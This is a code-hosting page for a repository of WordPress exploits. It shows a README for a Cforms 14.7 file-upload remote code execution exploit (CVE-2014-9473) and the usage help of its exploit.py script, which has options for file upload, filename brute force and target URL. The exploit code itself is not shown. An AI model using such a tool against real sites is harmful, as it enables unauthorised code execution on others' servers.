crash.software
Projects
Pull Requests
Issues
Builds
WP-Vulnerabilities-Exploits
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY WP-Vulnerabilities-Exploits Files
🤬
main
..
README.md Loading last commit info...
exploit.py
README.md

WordPress Plugin Cforms 14.7 - Remote Code Execution


prok3z@prok3z ~/Á/p/W/CVE-2014-9473 [2]> python2 exploit.py -h
Cforms II File Upload + Remote Code Execution

Usage: exploit.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  file to upload
  -i ITERATIONS, --max-iterations=ITERATIONS
                        Numbe of fields to iterate
  -b BRUTE, --upload-file-name-bruteforce=BRUTE
                        Uploaded file name brute force
  -n NUMBER, --cforms-form-number=NUMBER
                        Cforms form number
  -c HOME, --cforms-home-dir=HOME
                        Cforms form home dir
  -u URL, --url=URL     vulnerable url with contact form, example:
                        http://127.0.0.1/Contact/
Please wait...
Page is in error, reload to recover